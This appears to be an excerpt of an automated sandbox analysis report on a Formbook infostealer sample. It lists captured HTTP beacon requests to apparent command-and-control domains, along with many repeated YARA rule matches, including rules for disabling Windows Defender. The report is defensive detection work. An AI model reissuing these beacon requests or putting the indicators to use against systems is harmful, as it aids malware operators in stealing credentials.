          Source: global trafficHTTP traffic detected: GET /aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx HTTP/1.1Host: www.fuugiti.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aet3/?l48p=X6tC1H3r17TreXHELX+2yuKJ2Zy3hFZBFF1ZVzxWbyQ4jAOrOCxIDAhBMXT7pXuuuH38&vHn=5j90bfXx9vsx HTTP/1.1Host: www.coraroseromance.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /aet3/?l48p=Cb4ia8HH1RnDyQ8jvjqe0JDM7pVrsOY5rXp7lN7wIP/kU7YbHz52vieK+EDcuAZr7Fd5&vHn=5j90bfXx9vsx HTTP/1.1Host: www.loveuco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
          Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, TTgRfVYhTcfTOWPfY/QKSMLaRKXNTJLLdXS.csLarge array initialization: QfbcJdgJKQMMNfJNZ: array initializer size 522752
          Source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.ByteCodeGenerator.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.ByteCodeGenerator.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.ByteCodeGenerator.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.ByteCodeGenerator.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.ByteCodeGenerator.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
          Source: 0.2.SecuriteInfo.com.Variant.Tedy.130342.18814.exe.4bce918.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.ByteCodeGenerator.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.ByteCodeGenerator.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.ByteCodeGenerator.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_009DD0140_2_009DD014
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_009DE5B40_2_009DE5B4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_009D884F0_2_009D884F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exeCode function: 0_2_018732400_2_01873240
